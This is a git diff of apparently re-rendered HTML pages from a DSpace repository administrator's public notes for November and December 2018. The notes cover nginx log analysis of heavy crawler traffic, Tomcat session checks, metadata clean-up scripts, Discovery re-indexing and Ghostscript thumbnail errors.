$ curl -X GET -H &#34;Content-Type: application/json&#34; -H &#34;Accept: application/json&#34; -H &#34;rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc&#34; https://dspacetest.cgiar.org/rest/status
{&#34;okay&#34;:true,&#34;authenticated&#34;:false,&#34;email&#34;:null,&#34;fullname&#34;:null,&#34;token&#34;:null}%
</code></pre><ul>
<li>Improve the documentatin of my <a href="https://github.com/alanorth/dspace-statistics-api">dspace-statistics-api</a></li>
<li>Email Modi and Jayashree from ICRISAT to ask if they want to join CGSpace as partners</li>
@ -656,15 +656,15 @@ $ curl -X GET -H &quot;Content-Type: application/json&quot; -H &quot;Accept: app
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -36,7 +36,7 @@ Send a note about my dspace-statistics-api to the dspace-tech mailing list
Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage
Today these are the top 10 IPs:
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -66,12 +66,12 @@ Today these are the top 10 IPs:
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -117,7 +117,7 @@ Today these are the top 10 IPs:
<p class="blog-post-meta">
<time datetime="2018-11-01T16:41:30+02:00">Thu Nov 01, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -132,7 +132,7 @@ Today these are the top 10 IPs:
<li>Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage</li>
<li>Today these are the top 10 IPs:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1300 66.249.64.63
1384 35.237.175.180
1430 138.201.52.218
@ -148,22 +148,22 @@ Today these are the top 10 IPs:
<li><code>70.32.83.92</code> is well known, probably CCAFS or something, as it&rsquo;s only a few thousand requests and always to REST API</li>
<li><code>84.38.130.177</code> is some new IP in Latvia that is only hitting the XMLUI, using the following user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1
</code></pre><ul>
<li>They at least seem to be re-using their Tomcat sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=84.38.130.177' dspace.log.2018-11-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=84.38.130.177&#39; dspace.log.2018-11-03
342
</code></pre><ul>
<li><code>50.116.102.77</code> is also a regular REST API user</li>
<li><code>40.77.167.175</code> and <code>207.46.13.156</code> seem to be Bing</li>
<li><code>138.201.52.218</code> seems to be on Hetzner in Germany, but is using this user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
</code></pre><ul>
<li>And it doesn&rsquo;t seem they are re-using their Tomcat sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=138.201.52.218' dspace.log.2018-11-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=138.201.52.218&#39; dspace.log.2018-11-03
1243
</code></pre><ul>
<li>Ah, we&rsquo;ve apparently seen this server exactly a year ago in 2017-11, making 40,000 requests in one day&hellip;</li>
@ -171,7 +171,7 @@ Today these are the top 10 IPs:
<li>Linode sent a mail that CGSpace (linode18) is using high outgoing bandwidth</li>
<li>Looking at the nginx logs again I see the following top ten IPs:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1979 50.116.102.77
1980 35.237.175.180
2186 207.46.13.156
@ -185,13 +185,13 @@ Today these are the top 10 IPs:
</code></pre><ul>
<li><code>78.46.89.18</code> is new since I last checked a few hours ago, and it&rsquo;s from Hetzner with the following user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
</code></pre><ul>
<li>It&rsquo;s making lots of requests, though actually it does seem to be re-using its Tomcat sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-03
8449
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-03 | sort | uniq | wc -l
1
</code></pre><ul>
<li><em>Updated on 2018-12-04 to correct the grep command above, as it was inaccurate and it seems the bot was actually already re-using its Tomcat sessions</em></li>
@ -200,7 +200,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
<li>I think it&rsquo;s reasonable for a human to click one of those links five or ten times a minute&hellip;</li>
<li>To contrast, <code>78.46.89.18</code> made about 300 requests per minute for a few hours today:</li>
</ul>
<pre><code># grep 78.46.89.18 /var/log/nginx/access.log | grep -o -E '03/Nov/2018:[0-9][0-9]:[0-9][0-9]' | sort | uniq -c | sort -n | tail -n 20
<pre tabindex="0"><code># grep 78.46.89.18 /var/log/nginx/access.log | grep -o -E &#39;03/Nov/2018:[0-9][0-9]:[0-9][0-9]&#39; | sort | uniq -c | sort -n | tail -n 20
286 03/Nov/2018:18:02
287 03/Nov/2018:18:21
289 03/Nov/2018:18:23
@ -232,7 +232,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
<li>Linode emailed about the CPU load and outgoing bandwidth on CGSpace (linode18) again</li>
<li>Here are the top ten IPs active so far this morning:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1083 2a03:2880:11ff:2::face:b00c
1105 2a03:2880:11ff:d::face:b00c
1111 2a03:2880:11ff:f::face:b00c
@ -246,15 +246,15 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
</code></pre><ul>
<li><code>78.46.89.18</code> is back&hellip; and it is still actually re-using its Tomcat sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-04
8765
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-04 | sort | uniq | wc -l
1
</code></pre><ul>
<li><em>Updated on 2018-12-04 to correct the grep command and point out that the bot was actually re-using its Tomcat sessions properly</em></li>
<li>Also, now we have a ton of Facebook crawlers:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Nov/2018&quot; | grep &quot;2a03:2880:11ff:&quot; | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
905 2a03:2880:11ff:b::face:b00c
955 2a03:2880:11ff:5::face:b00c
965 2a03:2880:11ff:e::face:b00c
@ -275,18 +275,18 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
</code></pre><ul>
<li>They are really making shit tons of requests:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04
37721
</code></pre><ul>
<li><em>Updated on 2018-12-04 to correct the grep command to accurately show the number of requests</em></li>
<li>Their user agent is:</li>
</ul>
<pre><code>facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)
<pre tabindex="0"><code>facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)
</code></pre><ul>
<li>I will add it to the Tomcat Crawler Session Manager valve</li>
<li>Later in the evening&hellip; ok, this Facebook bot is getting super annoying:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Nov/2018&quot; | grep &quot;2a03:2880:11ff:&quot; | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
1871 2a03:2880:11ff:3::face:b00c
1885 2a03:2880:11ff:b::face:b00c
1941 2a03:2880:11ff:8::face:b00c
@ -307,15 +307,15 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
</code></pre><ul>
<li>Now at least the Tomcat Crawler Session Manager Valve seems to be forcing it to re-use some Tomcat sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04
37721
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04 | sort | uniq | wc -l
15206
</code></pre><ul>
<li>I think we still need to limit more of the dynamic pages, like the &ldquo;most popular&rdquo; country, item, and author pages</li>
<li>It seems these are popular too, and there is no fucking way Facebook needs that information, yet they are requesting thousands of them!</li>
</ul>
<pre><code># grep 'face:b00c' /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c 'most-popular/'
<pre tabindex="0"><code># grep &#39;face:b00c&#39; /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c &#39;most-popular/&#39;
7033
</code></pre><ul>
<li>I added the &ldquo;most-popular&rdquo; pages to the list that return <code>X-Robots-Tag: none</code> to try to inform bots not to index or follow those pages</li>
@ -325,20 +325,20 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11
<ul>
<li>I wrote a small Python script <a href="https://gist.github.com/alanorth/4ff81d5f65613814a66cb6f84fdf1fc5">add-dc-rights.py</a> to add usage rights (<code>dc.rights</code>) to CGSpace items based on the CSV Hector gave me from MARLO:</li>
</ul>
<pre><code>$ ./add-dc-rights.py -i /tmp/marlo.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-dc-rights.py -i /tmp/marlo.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>The file <code>marlo.csv</code> was cleaned up and formatted in Open Refine</li>
<li>165 of the items in their 2017 data are from CGSpace!</li>
<li>I will add the data to CGSpace this week (done!)</li>
<li>Jesus, is Facebook <em>trying</em> to be annoying? At least the Tomcat Crawler Session Manager Valve is working to force the bot to re-use its Tomcat sessions:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;05/Nov/2018&quot; | grep -c &quot;2a03:2880:11ff:&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Nov/2018&#34; | grep -c &#34;2a03:2880:11ff:&#34;
29889
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-05
29763
# grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05 | sort | uniq | wc -l
# grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-05 | sort | uniq | wc -l
1057
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;05/Nov/2018&quot; | grep &quot;2a03:2880:11ff:&quot; | grep -c -E &quot;(handle|bitstream)&quot;
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | grep -c -E &#34;(handle|bitstream)&#34;
29896
</code></pre><ul>
<li>29,000 requests from Facebook and none of the requests are to the dynamic pages I rate limited yesterday!</li>
@ -350,7 +350,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11
<li>While I was updating the <a href="https://gist.github.com/alanorth/ddd7f555f0e487fe0e9d3eb4ff26ce50">rest-find-collections.py</a> script I noticed it was using <code>expand=all</code> to get the collection and community IDs</li>
<li>I realized I actually only need <code>expand=collections,subCommunities</code>, and I wanted to see how much overhead the extra expands created so I did three runs of each:</li>
</ul>
<pre><code>$ time ./rest-find-collections.py 10568/27629 --rest-url https://dspacetest.cgiar.org/rest
<pre tabindex="0"><code>$ time ./rest-find-collections.py 10568/27629 --rest-url https://dspacetest.cgiar.org/rest
</code></pre><ul>
<li>Average time with all expands was 14.3 seconds, and 12.8 seconds with <code>collections,subCommunities</code>, so <strong>1.5 seconds difference</strong>!</li>
</ul>
@ -403,22 +403,22 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11
<ul>
<li>Testing corrections and deletions for AGROVOC (<code>dc.subject</code>) that Sisay and Peter were working on earlier this month:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2018-11-19-correct-agrovoc.csv -f dc.subject -t correct -m 57 -db dspace -u dspace -p 'fuu' -d
$ ./delete-metadata-values.py -i 2018-11-19-delete-agrovoc.csv -f dc.subject -m 57 -db dspace -u dspace -p 'fuu' -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-11-19-correct-agrovoc.csv -f dc.subject -t correct -m 57 -db dspace -u dspace -p &#39;fuu&#39; -d
$ ./delete-metadata-values.py -i 2018-11-19-delete-agrovoc.csv -f dc.subject -m 57 -db dspace -u dspace -p &#39;fuu&#39; -d
</code></pre><ul>
<li>Then I ran them on both CGSpace and DSpace Test, and started a full Discovery re-index on CGSpace:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Generate a new list of the top 1500 AGROVOC subjects on CGSpace to send to Peter and Sisay:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2018-11-19-top-1500-subject.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2018-11-19-top-1500-subject.csv WITH CSV HEADER;
</code></pre><h2 id="2018-11-20">2018-11-20</h2>
<ul>
<li>The Discovery re-indexing on CGSpace never finished yesterday&hellip; the command died after six minutes</li>
<li>The <code>dspace.log.2018-11-19</code> shows this at the time:</li>
</ul>
<pre><code>2018-11-19 15:23:04,221 ERROR com.atmire.dspace.discovery.AtmireSolrService @ DSpace kernel cannot be null
<pre tabindex="0"><code>2018-11-19 15:23:04,221 ERROR com.atmire.dspace.discovery.AtmireSolrService @ DSpace kernel cannot be null
java.lang.IllegalStateException: DSpace kernel cannot be null
at org.dspace.utils.DSpace.getServiceManager(DSpace.java:63)
at org.dspace.utils.DSpace.getSingletonService(DSpace.java:87)
@ -458,7 +458,7 @@ java.lang.IllegalStateException: DSpace kernel cannot be null
<li>fix column with invalid spaces in metadata field name (cg. subject. wle)</li>
<li>remove columns with no metadata (place, target audience, isbn, uri, publisher, ispartofseries, subject)</li>
<li>remove some weird Unicode characters (0xfffd) from abstracts, citations, and titles using Open Refine: <code>value.replace('<27>','')</code></li>
<li>I notice a few items using DOIs pointing at ICARDA&rsquo;s DSpace like: <a href="https://doi.org/20.500.11766/8178,">https://doi.org/20.500.11766/8178,</a> which then points at the &ldquo;real&rdquo; DOI on the publisher&rsquo;s site&hellip; these should be using the real DOI instead of ICARDA&rsquo;s &ldquo;fake&rdquo; Handle DOI</li>
<li>I notice a few items using DOIs pointing at ICARDA&rsquo;s DSpace like: <a href="https://doi.org/20.500.11766/8178">https://doi.org/20.500.11766/8178</a>, which then points at the &ldquo;real&rdquo; DOI on the publisher&rsquo;s site&hellip; these should be using the real DOI instead of ICARDA&rsquo;s &ldquo;fake&rdquo; Handle DOI</li>
<li>Some items missing DOIs, but they clearly have them if you look at the publisher&rsquo;s site</li>
</ul>
</li>
@ -479,13 +479,13 @@ java.lang.IllegalStateException: DSpace kernel cannot be null
<li><a href="https://cgspace.cgiar.org/handle/10568/97709">This WLE item</a> is issued on 2018-10 and accessioned on 2018-10-22 but does not show up in the <a href="https://cgspace.cgiar.org/handle/10568/41888">WLE R4D Learning Series</a> collection on CGSpace for some reason, and therefore does not show up on the WLE publication website</li>
<li>I tried to remove that collection from Discovery and do a simple re-index:</li>
</ul>
<pre><code>$ dspace index-discovery -r 10568/41888
<pre tabindex="0"><code>$ dspace index-discovery -r 10568/41888
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
</code></pre><ul>
<li>&hellip; but the item still doesn&rsquo;t appear in the collection</li>
<li>Now I will try a full Discovery re-index:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Ah, Marianne had set the item as private when she uploaded it, so it was still private</li>
<li>I made it public and now it shows up in the collection list</li>
@ -497,7 +497,7 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
<li>Linode alerted me that the outbound traffic rate on CGSpace (linode19) was very high</li>
<li>The top users this morning are:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;27/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;27/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
229 46.101.86.248
261 66.249.64.61
447 66.249.64.59
@ -512,7 +512,7 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
<li>We know 70.32.83.92 is CCAFS harvester on MediaTemple, but 205.186.128.185 is new appears to be a new CCAFS harvester</li>
<li>I think we might want to prune some old accounts from CGSpace, perhaps users who haven&rsquo;t logged in in the last two years would be a conservative bunch:</li>
</ul>
<pre><code>$ dspace dsrun org.dspace.eperson.Groomer -a -b 11/27/2016 | wc -l
<pre tabindex="0"><code>$ dspace dsrun org.dspace.eperson.Groomer -a -b 11/27/2016 | wc -l
409
$ dspace dsrun org.dspace.eperson.Groomer -a -b 11/27/2016 -d
</code></pre><ul>
@ -553,15 +553,15 @@ $ dspace dsrun org.dspace.eperson.Groomer -a -b 11/27/2016 -d
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -36,7 +36,7 @@ Then I ran all system updates and restarted the server
I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another Ghostscript vulnerability last week
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -66,12 +66,12 @@ I noticed that there is another issue with PDF thumbnails on CGSpace, and I see
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -117,7 +117,7 @@ I noticed that there is another issue with PDF thumbnails on CGSpace, and I see
<p class="blog-post-meta">
<time datetime="2018-12-02T02:09:30+02:00">Sun Dec 02, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -135,8 +135,8 @@ I noticed that there is another issue with PDF thumbnails on CGSpace, and I see
<ul>
<li>The error when I try to manually run the media filter for one item from the command line:</li>
</ul>
<pre><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&quot; &quot;-f/tmp/magick-129895Bmp44lvUfxo&quot; &quot;-f/tmp/magick-12989C0QFG51fktLF&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&quot; &quot;-f/tmp/magick-129895Bmp44lvUfxo&quot; &quot;-f/tmp/magick-12989C0QFG51fktLF&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
<pre tabindex="0"><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&#34; &#34;-f/tmp/magick-129895Bmp44lvUfxo&#34; &#34;-f/tmp/magick-12989C0QFG51fktLF&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&#34; &#34;-f/tmp/magick-129895Bmp44lvUfxo&#34; &#34;-f/tmp/magick-12989C0QFG51fktLF&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.Info.getBaseInfo(Info.java:360)
at org.im4java.core.Info.&lt;init&gt;(Info.java:151)
at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
@ -157,14 +157,14 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
<li>I think we need to wait for a fix from Ubuntu</li>
<li>For what it&rsquo;s worth, I get the same error on my local Arch Linux environment with Ghostscript 9.26:</li>
</ul>
